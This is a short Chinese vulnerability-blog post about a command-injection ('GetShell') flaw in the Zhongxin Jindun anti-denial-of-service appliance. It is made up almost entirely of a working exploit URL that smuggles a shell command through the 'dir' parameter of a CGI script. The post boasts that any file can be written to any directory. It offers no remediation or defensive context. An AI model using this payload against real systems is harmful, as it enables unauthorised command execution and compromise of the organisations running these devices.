中新金盾抗拒绝服务系统GetShell漏洞2

  • A+
所属分类:漏洞时代
摘要

漏洞证明:
https://1.1.1.1:28XXX/cgi-bin/index.php?t=analysis_download&c=tarfile&dir=1 || uname -a > /tmp/1||echo


漏洞作者: Tea

漏洞证明:
https://1.1.1.1:28XXX/cgi-bin/index.php?t=analysis_download&c=tarfile&dir=1 || uname -a > /tmp/1||echo

命令:

uname -a > /tmp/1

写入到/tmp/1文件

可以写任意文件到任意目录,还愁啥?

中新金盾抗拒绝服务系统GetShell漏洞2

 

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: